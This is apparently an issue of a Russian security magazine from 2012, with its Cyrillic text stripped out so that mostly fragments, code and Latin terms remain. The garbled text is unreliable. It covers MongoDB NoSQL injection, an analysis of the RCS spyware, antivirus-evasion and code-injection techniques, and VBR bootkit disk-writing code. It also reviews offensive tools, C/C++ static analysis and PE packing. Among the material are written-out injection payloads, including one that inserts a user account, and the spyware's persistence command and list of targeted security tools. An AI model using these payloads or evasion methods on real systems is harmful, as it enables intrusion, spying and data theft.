
MongoDB
,
10gen
2007 . MongoDB
2009 .
.

, ,

.
MongoDB
, Disney,
SAP, Forbes .

NOSQL?

,

NoSQL .
1. .
NoSQL
. MongoDB
20000
4800 .
2. .
MongoDB
,
, Oracle.
3. ,
.

02 /157/ 2012

MongoDB

. , password
login ,
.
root. root' // .
! ,
MongoDB:

JavaScript
.
,
.
: 85 % .

{ '$where':
'this.login === \'root\' //\' && this.password === \'\'' }

// JavaScript,
this.login === 'root'.
,
, , .
, .
JavaScript db.eval(...).
eval :
var js = "function () { return db.users.findOne ({ login: '"
+ login + "', password: '" + password + "' }); }"
db.eval(js);

,
. pen_test
pen_test. :
'}), db.users.insert({login: 'pen_test', password:
'pen_test'}), 1 } //

-, . -,
pen_test :).

, MongoDB
Map/Reduce
.
4. .
NoSQL-.
,
, ,

.
5. !
NoSQL-
.

.

02 /157/ 2012

, NoSQL-. -, ,
NoSQL- ,
: ,
. ,
NoSQL- . -,
NoSQL- .

SQL, , : JSON, XQuery, REST-. , .

SQL- (
MySQL, Oracle SQL Server),
.
,
,
,
(, JavaScript MongoDB).

.
, :

, NoSQL-, , SQL-. z

,
.
,
.
,

,


.

NOSQL?

, NoSQL-
.
, :
, Google,
Amazon Windows Azure Microsoft.

: Facebook,
Twitter, LinkedIn , .
SaaS. Software-as-Service

, . SaaS- NoSQL.
, , Salesforce.com
SaaS CRM.
. ,
.
NoSQL, , -, ,
-,
, .

063

Johnny Catch

: ?

REMOTE
CONTROL SYSTEM
IT-
,


.
,
.

DVD

,



RCS

064

- ? , ,
, , . ,
, ,
?
2011 Chaos
Computer Club (CCC) -
,
,
.
.
XDA-developers ,
, Android iPhone,

.
.
Remote Control System,
, , ,
.

REMOTE CONTROL SYSTEM


,
.

02 /157/ 2012

: ?

, x64-

Android-

HackingTeam (www.hackingteam.it)
.
, RCS
.
, ,
, ,
. , Skype, Google Talk IM.
-,

. , RCS ,

,
. Windows, Mac
,
iPhone Android. , RCS

. :
, Zone Alarm
, RootkitRevealer
. Wireshark,
-,
HTTP-POST- .

CARRIER IQ:

Android- HTC,
,

, ,
, , ,
. . ,
Carrier IQ,
,
.
CIQ,
. , CIQ
.
Sense
UI, Samsung
Touch Wiz.
,
, root,
( bit.ly/sdkKcE).

02 /157/ 2012

, ,

. RCS
C, %APPDATA%,
Run,
- . , , .
exe,
dll RCS.
, Windows (
/):
1. 7KOmPPPs.TRK (DLL, x86).
2. a5jt555f.Qu6.
3. CrThBBBT.7ar (DLL, x86).
4. x64- tms5ggg8.T4t (DLL, x64).
5. x64 0Cfkvvvw.HiO (SYS, x64).
6. x86 YDxohhhn.pYS (SYS, x86).

x64- . ,

. ,
( ), .

?
, x86- RCS.
,
x86. Dll
: HFF1,
HFF2, ..., HFF8. Run, , :
rundll32.exe "c:\trSMKKK0\7KOmPPPs.TRK",HFF8

065


,
HFF8. , dll IDA, ,
- ,

,
,
, .
, .

HFF8
. :
, rundll32.exe ,
dll, ,
HFF1 .
GetModuleFileNameExW
dll ( ), ASCII
.
shared-, ,
, dll .
, (
) shared-
.

. , shared- .
FileMapping. ,
KMS1, KMS2, KMS3.
hex-. , .
.
Android

R2D2
Chaos
Computer Club (CCC) ,
, ,
.
- C3POr2d2-POE, R2D2. DLL
mfc42ul.dll winsys32.sys x86.
DLL SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ,
,
GUI-. ,
, ,
Skype,
. ,
, RCS. ,
,

AES ECB ,

.
CCC

. CCC
,
www.ccc.de.

066

.

MSH4DEV1, x86- ( 6
). , handle . , .
:
.
: Avira, Avast, Eyee, ProcGuard,
McAfee, Kerio, Comodo, Panda, TrendMicro, Ashampoo, Kaspersky,
AVG, BitDefender -
. , YDxohhhn.pYS (
),
Windows ndisk.sys.
ADVAPI32 CreateService, StartService
. . MSH4DEV1
ndisk.sys. , ,
.
. AES CBC
128 . ,
.
KeyExpansion,
. shared-.
, ,

02 /157/ 2012

: ?


128- .
-
.
-,
,
, ,
, .
.

,
.
,
.
: HFF1, HFF2, HFF3.
, .
,
(while(true){ Sleep(1000); }).
,
.
: FileMapping
(KMS1..., KMS2..., KMS3...), ,
.
.

ANDROID- RCS
Android-
apk-,
,
.
apk Java-
ApkManager, .
,
, , . . ApkManager

,
.
apk- ,
native- (so),
. ,
AES CBC.
PKCS#5 , ,
.
,
-.
,
.
,
- Android
root (
). RCS (SMS,
MMS, ) ,

.
com.android.
service, .
, Dr.Web
Light Android,
.

02 /157/ 2012

WinAPI ,
GetProcAddress.
.
.
64-
x86.
, , 64-, , dll
, x64.

, , : dll . FileMapping
( HFF4),
( HFF3). dll
,
( , ).
.
, , .
, :
pcts*.exe
k7*.exe
avk.exe
admin.exe
bgscan.exe
avp.exe
pavark.exe
rku*.exe
svv.exe
IceSword.exe
gmer.exe
avgscanx.exe
RootkitRevealer.exe
avscan.exe
avgarkt.exe
sargui.exe
uncrackme.exe
hiddenfinder.exe
hackmon.exe
TaskMan.exe
outlook.exe
skypepm.exe
skype.exe
chrome.exe
firefox.exe

,
, RootkitRevealer.exe ololo.exe,
. :-)



:



067

RCS

-.
- , .
KMS1 ( 20 ) .
DWORD _ + _
.
300
. JPEG, speex (CrThBBBT.7ar). AES
CBC ( ),
. LOG_XXXX_YYYYYYYYY.log,
XXXX , Y...Y .
HTTP POST-. -
, ,
, ,

. :-)

,
, . ,
,
.
explorer.exe .
Firefox: mozcrt19.
dll, softokn3.dll mozsqlite3.dll,
SQLite- .
.



.
dll
.
, , ,
(
, , ,
).
, .
, . ,
,
, .

SUMMARY

Dr.Web Light

068

, ,
. ,

. Android

, ,
,
. , Zeus, TDSS, SpyEye . z

02 /157/ 2012

>> coding

(icq 884888, http://snipper.ru)

X-Tools


:
Michael Hendrickx
URL:
michaelhendrickx.
com/lilith
:
*nix/win

1
LILITH
LiLith
HTTP-. -
<form>,
SQL-. LiLith
, ,
:
,
-.
:
;
ColdFusion;
: , - ..;
.
:
./lilith.pl www.target.com

:
d ;
u basic authentication;
p ;
T ;
f ;
r ;
A HTTP-.
,
.

070

URL:
bit.ly/sw1I4w
:
*nix/win

:
David Rook
URL:
agnitiotool.sourceforge.net
:
Windows

SHELLFY:


AGNITIO

,
Shellfy. ,
Perl, . Shellfy
: .
PHP-,

(, ,
),
, , Perl'
. ,
:
(Shells);
(Domains);
(Stats);
(Update);
(Settings);
(Proxy).

-
. Agnitio

. ,
: ASP, ASP.net, C#,
Java, JavaScript, Perl, Php, Python, Ruby, VB.net,
XML.

:
;

;
;
,
,
;
;
;
,

( -).

. , Agnitio
(
) .


,
.
:
cgi-bin
setup.pl.
.
Shellfy
.

02 /157/ 2012

X-Tools

:
Corey Goldberg
URL:
www.webinject.org
:
*nix/win

:
Erik Hjelmvik
URL:
bit.ly/egH2pr
:
Windows

HTTP-
WebInject ,
-
-.

HTTP (JSP, ASP, CGI, PHP,
AJAX, Servlets, HTML Forms, XML/
SOAP Web Services, REST . .),

,


( ,
-).
API

:
Edge-Security
URL:
bit.ly/OA9vI
:
*nix/win

:
Ahmed Saafan
URL:
code.google.com/p/
fbpwn
:
*nix/win


NETWORKMINER


E-MAIL

NetworkMiner

, PCAP.
, ,
, ,
. NetworkMiner

, ,
.

, .
- . FTP, HTTP
SMB.
( ).
WLAN (IEEE 802.11).
, 500
,
.
NetworkMiner.

- ,

.
e-mail, .. ,
Acunetix
WVS ,
. ,

theHarvester,
BlackHat.

,
PGP.
:
XML HTML;

;
DNS reverse lookup;

Google, Bing, Linkedin Exalead.

02 /157/ 2012

XML,
. XML- , ,

.

,
Perl .

WebInject
Windows.
Perl.

e-mail',
microsoft.com
:
./theharvester.py -d microsoft.com \
-l 500 -b google

6
FACEBOOK!

. !

!
FBPwn
- Java-, Facebook.

.
,
,
.
FBPwn
:
1. .
2. friending-, .
3. clonning-,

.
4. .
5.
.
, , ,
:).

071

ZeroNights
2011


-
, non-stop , 11 , $10 000
, 0day-
,
ZeroNights 2011.

,
? :)
.
,
, . ,
.

,
, -
.
,
.
, ,
,
. ,
, ,
.

,
, . !

, live-
,
,
SCADA-
, ,

? :
,
?,
, ,
:).
,
.
,
,

072

02 /157/ 2011

ZeroNights 2011

)
, .
ONsec,
$5 000.
0day-,
,
.
?

RESPECT!

: .
FastTrack: 1520 .

, . , !

,
,
XSS, ZeroNights :).
, toxa (

2011 , ,
.
Chaos
Construction ( ),

: PHD ZeroNights.
,
, , , ,
,
.
. ,
: , , , ,
,
:). z


.
Lockpicking Village
:

.
,
crackme ,
SAP
.
,

, .
[RDOT].

! :)

][

-
,



.

(APT)
,
.

02 /157/ 2011

?

0day
,
, ,

,

.


HTTP-,

:



HTTP-,

.


- .


-


,
.

,
,
.
:).

3G LTE:


3G LTE.

,
,

SS7-.

073

MALWARE

(201074@mail.ru)

.
!

WWW


(callback) Windows

: www.sww-it.
ru/2010-02-21/362.

DVD

Blacklight F-Secure,

PID.


,
,
,

.

074

02 /157/ 2012

. !

1. ,

,
HIPS (Host Intrusion Prevention
System), , , ,

, -
. ,
-, ,
. ,
,
,
,
, -
,
.
,
,

2. , )


,
,

(
, ,
- ( 1
)).

,

,
, , , . , .

?
,
-

. , ,
2. (,
),
. ,
( ,
P2P-, ,
, )
,
. ,
:
-
(, , . .)
, , - ( ,
- ,
).

PID

3. McAfee Antivirus Plus

02 /157/ 2012

(, Blacklight F-Secure SpyDLLRemover)



(BPID).

.
PID.
, Blacklight
OpenProcess

0x0 0x4E1C. ,
,
. CreateToolhelp32Snapshot ,
.
:
,
.

075

MALWARE

4. RegNotifyChangeKeyValue.
McAfee, . ,

Event (),

.
RegNotifyChangeKeyValue, Windows
CmRegisterCallBackEx,
.

callback- ( ),
. , RegNotifyChangeKeyValue,
,
( ,
2010 klif.
sys
( 5)). ,
( ,
,
) (McAfee,
,
RegNotifyChangeKeyValue),
.


( explorer.
exe svchost.exe),

(, ) ,
.
,
, .



.

, .
, , .

-
( , DLL, Internet
Explorera . .). ,
: ,
. , ,
, .

API-
.
,
RegOpenKey,
RegCreateKey, RegDeleteKey advapi32.
dll NtOpenKey,

076

NtCreateKey, NtDeleteKey . . 3
, McAfee .
API-
RegNotifyChangeKeyValue. Windows
,
, .
(
4).


,
,
.

explorer.exe, svchost.exe.
, .
explorer.exe,

5. CmRegisterCallBackEx klif.sys
2010

02 /157/ 2012

. !

6. NtUserFindWindowEx

FindWindow ( FindWindowEx) progman. FindWindow,


, NtUserFindWindowEx,
, ( 6), ,
explorer.exe.
. :

OpenProcess,
PAGE_EXECUTE_
READWRITE (API- VirtualAllocEx),
, ,
,
(SuspendThread),
(GetThreadContext),

,
(SetThreadContext)
(ResumeThread),
, .
:
OpenProcess, -

7. DrWeb

,
(VirtualAllocEx), WriteProcessMemory
API-
CreateRemoteThread.

, OpenProcess\VirtualAllocEx\
WriteProcessMemory\SuspendThread\
GetThreadContext\ SetThreadContext\
ResumeThread OpenProcess\VirtualAllocEx\



( -
). ,
( 1).
:
, 0 1,
. ,
, ,
.
,
()
().
, (

02 /157/ 2012

,
1, , 0, ),

( 0 1,
,
).
(
) ( ).
( )


: ,
.

077

MALWARE
WriteProcessMemory\ CreateRemoteThread
, , , ,
,
API
. ,
,
API GetProcAddress ,
- .
, WriteProcessMemory.

,
. ,

.

NtAllocateVirtualMemory, NtFreeVirtualMemory
NtWriteVirtualMemory, API
CreateRemoteThread NtCreateThread. ,
, DrWeb dwprot.sys ( 7).


PsSetCreateThreadNotifyRoutine.
,

( 8).

,
, ,
,
.



, - ,
,
,

Task Manager.
, ,
,
.

9. PsSetCreateProcessNotifyRoutine DrWeb

. Windows

- .
( CmRegisterCallBackEx,
RegNotifyChangeKeyValue PsSetCreateThread
NotifyRoutine).

PsSetCreateProcessNotifyRoutine (PsSetCreat
eProcessNotifyRoutineEx Vista SP1),


( , 9
callback-
dwprot.sys ).
:

.
, ,
.


.
, , -
?
-,
, ,
( , ,
). -,

. -, ,
PID,
.
-, CreateToolhelp32Snapshot
( NtQuerySystemInformation
) ,

8.

078

02 /157/ 2012

. !

10. PsSetLoadImageNotifyRoutine DrWeb

.
, , .

ZwQuerySystemInformation
. (,
, API- Zw
Nt?
, .) , ,
- ,
.
, -

,
.


, ,
-

,
MS-DOS.
, ring0.
,

,

. ,


.
,
,
API-
NtLoadDriver. , -, ,
( , Comodo, F-Secure,

,
). ,
. PsSetLoadImageNotifyRoutine
,

.
callback-
,
(
, ,
), ( 10).
,
,
HKLM\
System\CurrentControlSet\Services (
11). ,
Type,
1, 2 8 ( SERVICE_KERNEL_DRIVER,
SERVICE_FILE_SYSTEM_DRIVER SERVICE_
RECOGNIZER_DRIVER ),
( 11).
, .



, ,
, ,
.

11. Kernel Detective 1.2.


, ?..

02 /157/ 2012


,
,
.
,
-, , ,

,
. z

079

MALWARE

(stannic.man@gmail.com)

VBR

,

BOOT-






,

.

.

INFO

Windows
System Programming,
2010 .
,
.

WWW




Windows,
www.
osronline.com.



kernel mode ,


64-
.

, -
.
,
, , . , , ,
? . ,
,

, SMS-. , ,

, VBR.

080

VBR-
Dr.Web Trojan.Mayachok.
, .
.

,
.
( , DOS),
(Volume Boot Record, VBR) - ,
. Master Boot Record (MBR),
, .
, VBR . VBR (Disk
Parameter Block),
, , , ..,
(Volume Boot Code),
.
(master boot) , .
MBR VBR
http://thestarman.narod.ru/asm/mbr/index.
html. VBR- ,
,

,
VBR. VBR- INT 13h
, .

VBR. . ntldr, bootmgr, osloader.
exe, winload.exe . ., ,
Windows. ,
,
(dr0-dr7) .
,
.

nt!KiSystemStartup,
IDT PatchGuard.

02 /157/ 2012

VBR-

:
LOADER_PARAMETER_BLOCK, LoadOrderList
(
), BootDriverList , \Registry\Machine\System\CurrentControlSet\
Services\null.
. , ,
raw- . API-
nbtdll!DeviceIoControl IOCTL_SCSI_PASS_THROUGH_DIRECT.
SCSI_PASS_THROUGH_DIRECT
SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER, SRB (SCSI Request Block).
:
if (Flags & SCSI_IO_WRITE_SECTOR)
{
Direction = SCSI_IOCTL_DATA_OUT;
OpCode = SCSIOP_WRITE;
OpCode16 = SCSIOP_WRITE16;
}
else
{
Direction = SCSI_IOCTL_DATA_IN;
OpCode = SCSIOP_READ;
OpCode16 = SCSIOP_READ16;
}
if (Spt = (PSCSI_PASS_THROUGH_DIRECT)malloc(bLen))
{
Sptb = (PSCSI_PASS_THROUGH_DIRECT_WITH_BUFFER)Spt;
hDrive = CreateFile(Drive, ....);
if (hDrive != INVALID_HANDLE_VALUE)
{
Spt->Length = sizeof(SCSI_PASS_THROUGH_DIRECT);
Spt->SenseInfoLength = SPTWB_SENSE_LENGTH;
Spt->DataIn = Direction;
Spt->DataTransferLength = Length;
Spt->TimeOutValue = 200;
Spt->DataBuffer = Buffer;
Spt->SenseInfoOffset = (ULONG)
((PCHAR)&Sptb->SenseInfoBuffer - (PCHAR)Sptb);
if (LOBYTE(LOWORD(GetVersion())) > 5)
Spt->Cdb16.OperationCode = OpCode16;
else
Spt->Cdb16.OperationCode = OpCode;
Spt->Cdb16.ForceUnitAccess = TRUE;
// Spt->Cdb16
Spt->Cdb16.Control = 0x10;
// SRB block
Status = DeviceIoControl(hDrive,
IOCTL_SCSI_PASS_THROUGH_DIRECT, Spt, bLen,
Spt, bLen, &bRead, NULL);
}
free(Spt);
}

, VBR-

. ,
. ,
, Mayachok
. ,
SMS-.
, youtube.com,
vkontakte.ru, odnoklassniki.ru, rostelecom.ru, support.akado.ru,
my.mail.ru .
- Trojan.Mayachok.1
URL ,
.
SMS-.
,
,
. , Trojan.Mayachok ,
, SMS- .
, VBR-
(
).

...

- .
, ,
,
. , TDL atapi.sys,
. VBR- ,
,
. , ,
VBR- . ,

? (.
). , VBR,
dll ,
PsCreateProcessNotifyRoutine .


,

, (
, , dll ). ,

PsCreateProcessNotifyRoutine
APC. ,
TDL/TDSS, ,

02 /157/ 2012

, .
. ,
,
VBR-, . ,
, TDL/TDSS ,
, ,
. z

081

MALWARE

deeonis (deeonis@gmail.com)


.
- .
, ,
, . rootkit'
UNIX-
. Microsoft.
MS-DOS -

082

02 /157/ 2012

1986
1986
(Amdjat Basit Faroog Alvi)
Brain. ,
,
, ,
,
.
Brain
,
- .
Brain -,
,
, 18 .

- MS-DOS. DOS. , --
Kerplunk 23 :
, ,
.

1993
1993 Microsoft
Windows NT 3.1,
.
,
-. MS-DOS,
.

1990

1995

XX

. 1990 Chameleon,
, , -.
Chameleon
.
1990-
Frodo Whale. -,
Whale
.

1995 Windows-
(Jeffrey Richter) Programming Applications for
Microsoft Windows ring3.

, .

1992
ExeHeader 1992 .
13h- /
,
MZ.
ExeHeader.396,
21h- exe-
.
. ExeHeader 16h, 1Ch, 2Fh.

1997
win32-, , 1997-
Win32.Cabanas. PE-,
. 101 , .
, Cabanas API-,
FindFirstFileA, FindFirstFileW, FindNextFileA
FindNextFileW. ,
, ,
- ,
.

, -
. , Win9x.
Zerg Windows
95/98 /, / .

BluePill .

,
.

1999
1999 (Greg Hoglund)
NT Rootkit,

Windows. PHRACK,
-,
, .
. Windows NT (P. Dabak et al Undocumented
Windows NT),
ring0.

Windows 2000, 2001 .

Black Internet Trojan www.weathertalkz.com

0
02
2 //157/
157/
1
57/
7/ 20
7/
201
2
2012
01
0
12

083
083
3

MALWARE

2000
he4hook.
,
.
,
.

2002
2002 Hacker
Defender ( HacDef). ,
, ,
he4hook. HacDef
, .

user-mode.

2003
Vanquish 2003 .
,
, ,
,
,
. Vanquish ring3.
Haxdoor.
,
- .
.
A-311 Death.

2004
2004 FU, .

Mebromi

08
084
84

,
, ,
.


, HacDef
FU.
,
,
-, Haxdoor.
Haxdoor, FU HacDef
80 % .
rootkit,
. .

2005
2005 ,
. , ,
RSA Security Microsoft
.
-

-.
,
,

rootkit-. .
GMER Rootkit Unhooker.
eEye
BootRoot,

. , ,
MBR,
MS-DOS. ,
Windows .

2006
2006 - e-mail- ,
Bagle Goldun. Rustock
rootkit-.


25 .

.

, , , ,
.
.
,
. 2006-
: SubVirt, Vitrio BluePill.
Black Hat Briefings
2006
Windows Vista.
,

. ,
100 % ,
. -

0
02 //157/
15 201
157
157/
20
2012
012
0

Mebratix

RedPill,


BluePill.

2007
2007
. Vbootkit, .

Windows Vista, .

:
Sinowal, Mebroot.
,
.


Mebroot, .
2007 - IceLord, .
, ,
.

2008
RedPill, -

0
02
2 //157/
157/
1
57/
7/ 20
7/
201
2
2012
01
0
12

, .
,
. , , . 2008 North
Security Labs ,
BluePill .
,
,


, ,
, -
-. .

2010
2010-,
-,
: Alipop, Black Internet Trojan Ghost
Shadow (Mebratix.b). , AdWare .
Mebratix
Symantec, Black Internet Trojan

.
rootkit
64- Windows. ,
, BackDoor.Tdss.
, , 2010
Stuxnet.

, ,
,
.
,

SIMATIC S7 SCADA SIMATIC WinCC Siemens.
- Stuxnet
.

2011
2011- Qihoo 360
BIOS- Mebromi. , ,
BIOS, MBR,
ring0, PE . Mebromi
BIOS-
IceLord, 2007 .

,
. MBR,
BOIS . ,
,

.
z

085
085
5

Preview
UNIXOID
104


OPENSOURCE 2011

2011 open source,
.
, ,
SQL- mysql.com.
, Microsoft
Oracle
-
. -
: 3.0
Linux, , Gnome KDE,
.

.
.

88


,
,
.

UNIXOID

94

HOW-TO: PE-

PE.
!

SYN\ACK

122

086


Windows Server 8
.
MS .

110




OpenSSL OpenSSH,
.

FERRUM

126

IT-
IDS/IPS?
- 5

.

132

SANDY BRIDGE

AMD A75?
, 6
.

02 /157/ 2012

(bumshmyak@yandex.ru)



C/C++

, ,


/C++
.

. ,
.
. ?

?
? , , , .
?
,
?
,
.
, ,
C/C++. ,
. -,
(Covertiy, PolySpace, PVS-Studio, Microsoft \analyze
flag ). -, ,
, .
, , :
GCC, Dehydra, Clang static analyzer, Cppcheck Coccinelle.

088

WWW
bit.ly/zihvQ c


.
bit.ly/16VLIE
GCC,
.
bit.ly/uEU4VQ
GCC,
,

++.
bit.ly/uD9w0B


GCC.
bit.ly/vZpq7F
GCC.
mzl.la/DWbf4
Dehydra.
bit.ly/11xRuQ Clang
Static Analyzer.
bit.ly/20g5f1
Cppcheck.
bit.ly/1Z3wXP
Coccinelle.
http://mzl.la/tEyXCL
DXR.

GCC


. http://bit.ly/16VLIE
GCC, . .
-Wall ,
, , .
(-Wformat):
void Wformat() {
double x = 1;
//
printf("%d\n", x);
char s[] = "%d\n";
//
printf(s, x);
}

(-Warray-bounds,
-O2, ):
int test_bounds[10];
int Warray_bounds() {
return test_bounds[10];
}

(-Wuninitialized) .
-Wextra .
, , , (-Wsign-compare):

02 /157/ 2012

C/C++

int Wsign_compare() {
int x = -1;
unsigned int y = 3;
if (x > y)
return 1; //
else
return 0;
}

-Wall -Wextra,
:
-Wconversion ,
(, double
int int unsigned int).
-Wcast_qual , ,
:
void Wcast_qual() {
const char* s = "constant string";
((char*)s)[0] = 'n';
}

C :
-O2 -Wall -Wextra -Wformat=2 -Winit-self -Warray-bounds
-Wdiv-by-zero -Wfloat-equal -Wundef -Wshadow -Wcast-qual
-Wconversion -Wempty-body -Waggregate-return
-Wunreachable-code

bit.ly/uEU4VQ ,
C++. :
-Weffc++
Effective C++ More Effective C++.
,
(
, -Wnon-virtual-dtor),
-.
-W-old-style-cast
C ( ). ++, ,
dynamic_cast, static_cast, reinterpret_cast const_cast.
++ :
-Wctor-dtor-privacy -Weffc++ -Wold-style-cast
-Woverloaded-virtual

GCC , , (bit.ly/uD9w0B).
. .
( )
deprecated.
.
:

,
my_memcpy . ,
,
NULL.
( ):
int* dest = NULL;
int* src = NULL;
my_memcpy(dest, src, 10);

DEHYDRA
4.5, GCC API
, .
bit.ly/vZpq7F .
Dehydra,
C++. Dehydra,
Mozilla, ,
++.
() JavaScipt,
. Dehydra :
process_type(type) ,
type .
process_function(decl, body)
(decl , body ,
).
process_decl(decl)
, .
Dehydra. ,
,
, ,
. JS- callgraph.js:
function print_all_fcalls(varobjs) {
for each (let obj in varobjs) {
if (obj.isFcall)
print(" " + obj.name)
if (obj.assign) // right side of assign
print_all_fcalls(obj.assign)
if (obj.arguments) // arguments of fcall
print_all_fcalls(obj.arguments)
}
}
function process_function(decl, body) {
print(decl.name + ":")
for each (let b in body) print_all_fcalls(b.statements)
}


process_function, , .
(, - -

int sqr(int x) __attribute__ ((deprecated));

nonnull. , . ,

extern void *
my_memcpy (void *dest, const void *src, size_t len)
__attribute__((nonnull (1, 2)));

02 /157/ 2012

scan-build scan-view

089

, scan-build

,
), .
workandsolve.cc:
int work(int data);
int solve(int data);
int work(int data) {
int res = solve(data);
return res;
}
int solve(int data) {
int res = work(data);
return res;
}
int main() {
solve(10);
return 0;
}

DXR

CLANG STATIC ANALYZER


Clang C/C++/Objective-C,
LLVM(llvm.org). lang ,
clang ( clang++)
--analyze. (bit.ly/11xRuQ) ,
. : core, deadcode, osx, unix. core ,
GCC:
;
;

;
, Objective-C.
osx, Mac OS X.
, , clang static analyzer. clang analyzer . clantest.c:

Dehydra:
g++ -fplugin=~/dehydra/gcc_dehydra.so -fplugin-arg-gcc_\
dehydra-script=callgraph.js workandsolve.cc -o /dev/null

:
work(int):
solve(int)
solve(int):
work(int)
main():
solve(int)
work(int)

- ,
: mzl.la/
DWbf4.
Dehydra .
.
mozilla-central (bit.ly/vJEl1B)
, Mozilla,
, . , final.js ,
, final.
, , .

090

#include <stdio.h>
int div_by_zero() {
int x = 0;
int y = 5 / x;
return y;
}
int null_dereference() {
int x = 0;
int* p = NULL;
if (x > 0)
p = &x;
return *p;
}
int main() {
return 0;
}

:
clang --analyze clangtest.c -o clangtest

:
clangtest.c:5:13: warning: Division by zero
int y = 5 / x;
^

02 /157/ 2012

C/C++

clangtest.c:15:10: warning: Dereference of null pointer...


return *p;
^~
2 warnings generated.

x > 0 x >= 0 null_dereference,


, , .
clang scan-build,
. , .
.
,
CC CXX , .
clangtest.c
Makefile:
clangtest : clangtest.c
$(CC) -o clangtest clangtest.c

scan-build make. ,
scan-view.
Clang ,
DXR, . DXR
. ,
, ,
, .
, DXR Dehydra. DXR
, mzl.la/tEyXCL.

CPPCHECK
Cppcheck C++. Cppcheck , .
,
.
, C++.

:
cppcheck --rule="/ 0"

C++:
void CheckOther::divisionByZero() {
// Loop through all tokens
for (const Token *tok = _tokenizer->tokens();
tok; tok = tok->next()) {
// check if there is a division by zero
if (Token::Match(tok, "/ 0")) {
// report error
divisionByZeroError(tok);
}
}
}

Cppcheck .
:
;
;
STL Boost;
;

02 /157/ 2012

;
;
. .
Cppcheck , . , .
: ,
.
class Newbie {
public:
Newbie() {
resource = new int[256];
}
private:
int* resource;
};
int main() {
Newbie noob;
return 0;
}


Cppcheck .!
bit.ly/s6RQoH , Cppcheck
. , ,
C.
- .

COCCINELLE
Coccinell ( [])
-. SmPL (Semantic
Patch Language). , C . coccinelle
. ,
,
.
? Coccinelle .
,
. coccinelle ,
. ,
. , ,
.
:
@[ ]@

@@

,
@. - (,
, ).
.

C. ,
,
( , ). .
,
!x & y,

091

Linux, Herodotos

coccinelle. , flags,
. ,
, :

int flags = UGLY_FLAG;


if (!flags & UGLY_FLAG)
if (!(flags & UGLY_FLAG))
return 1;
else
return 0;

-dir spatch C- .
, !x & y .
bit.ly/d1qgI6 ,
coccinelle Linux. , 20
!x & y!
,
(bit.ly/rVQQ9Z):

!(flags & UGLY_FLAG)

,
:
!flags & UGLY_FLAG

!flags , , ,
, , . , , :
notand.cocci
@notand@
expression E;
constant C;
@@
- !E & C
+ !(E & C)

, notand.
, E, , C,
. , , !E & C.
:
notand.c
#define UGLY_FLAG = 0x2;
int main() {
int flags = UGLY_FLAG;
if (!flags & UGLY_FLAG)
return 1;
else
return 0;
}

Coccinelle spatch, C-.


C, spatch diff, .
spatch :
spatch -sp_file notand.cocci notand.c

:
HANDLING: notand.c
diff =
--- notand.c
+++ /tmp/cocci-output-3029-af66fa-notand.c
@@ -2,7 +2,7 @@
int main() {

092

--- a/drivers/serial/m32r_sio.c
+++ b/drivers/serial/m32r_sio.c
@@ -421,7 +421,7 @@ static void transmit_chars(
struct uart_sio_port *up)
while (!serial_in(up, UART_LSR) & UART_LSR_THRE);
+
while (!(serial_in(up, UART_LSR) & UART_LSR_THRE));
} while (--count > 0);

Linux
, memset
. :
@@
type T;
T *x;
expression E;
@@
memset(x, E, sizeof(
+ *
x))

, x T E. memset,
,
*, T.
Linux (bit.ly/rsLIlg):
--- a/drivers/staging/wlan-ng/prism2fw.c
+++ b/drivers/staging/wlan-ng/prism2fw.c
@@ -439,7 +439,7 @@ void free_chunks(imgchunk_t *fchunk,
unsigned int *nfchunks)
}
}
*nfchunks = 0;
memset(fchunk, 0, sizeof(fchunk));
+
memset(fchunk, 0, sizeof(*fchunk));
}

SmPL
, ( )
.
. malloc ,
-.
, ( ). - , , .
,
. ,

02 /157/ 2012

C/C++

. Linux 13
(bit.ly/d1qgI6). ,
:
@leak@
type T;
T* x;
statement S;
identifier a=~.*alloc$;
@@
* x = a(...);
if (x == NULL) S
... when != x
* return ...;

, ,
a, , alloc.
, ,
.
, .
* x = a(...);

+ , , . *
. .
, when:
... when != x

, , x ( x ).

diff:
diff =
--- leak.c
+++ /tmp/cocci-output-11639-4c40d5-leak.c
@@ -2,12 +2,10 @@
int main(int argc, char** argv) {
char* param;
- param = malloc(257);
if (param == NULL) {
return 1;
}
if (argc < 2) {
return 1;
}
// ... using param
free(param);
return 0;
}

, ( *).
SmPL , , (
- , -),
Python . .
coccinelle (bit.ly/1Z3wXP).
coccinelle .
Coccicheck , :
;
NULL;

02 /157/ 2012

Cppcheck

sizeof(pointer);
!x & y;
;
.

coccicheck ,
(,
, ). Coccicheck
scripts/ coccinelle.
Herodotos (bit.ly/vrmt8v)
.
.
Coccigrep (bit.ly/qxM9nd) grep C.

( DXR).
Spdiff (bit.ly/rLhp7P) diff, .
,
.
Coccinelle c
(bug that eats another bugs).
, , , SmPL, . .
, Linux (
bit.ly/d1qgI6, ).

,
?

( -Wall). (, intel,
clang). . C++, (++ ;
,
GCC). ppcheck,
. C++ Dehydra,
, , .
. Coccinelle,
Frama-C.
, .

(
). ,
.
, ,
,

. . z

093

HOW-TO:
PE-

Peter and the Wolf

DVD

INFO




DVD.

LoadExecutable


,

,

.

,
PE-,
- .
,

. , - ,
,

, - .
.
,

.
-, Windows XP ,

UPX. ,
UPX ,
. , .
. .
(Zeus
2.0.8.9, bit.ly/v3EiYP). ,
(Windows 2000, bit.ly/rBZlCy).
, ,
, .
(bit.ly/vRPCxZ,

094

02 /157/ 2012

HOW-TO: PE-

bin2h

bit.ly/tSUxT7) ,
Volodya NEOx.
, , , PE-.

,
.
, ,
:

, , notepad.exe. 32- - 60 . , .
? ,
.
.
. - ,
60 , , ,
20 . ,
, ,
, .
(), ,
. , ,
. ,
( , ) , , ,
.
,
. ,
, , .
:
PE- ;
- ;
PE
-.
:
PE-;
;
PE-, , .
, .

, , ,
PE-.

02 /157/ 2012


// PE-
HMODULE hModule = GetModuleHandle(NULL);
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS pNTHeaders =
MakePtr(PIMAGE_NT_HEADERS,hModule,pDosHeader->e_lfanew);
PIMAGE_SECTION_HEADER pSections =
IMAGE_FIRST_SECTION(pNTHeaders);
// ,

PIMAGE_SECTION_HEADER pLastSection =
&pSections[pNTHeaders->FileHeader.NumberOfSections - 1];
// ,
LPBYTE pbPackedImage = MakePtr(LPBYTE, hModule,
pLastSection->VirtualAddress);
//
DWORD dwPackedImageSize = pLastSection->SizeOfRawData;

, ,
. , , ,
. , ,
.
:
LPBYTE pbPackedImage = (LPBYTE) 0xDEADBEEF;
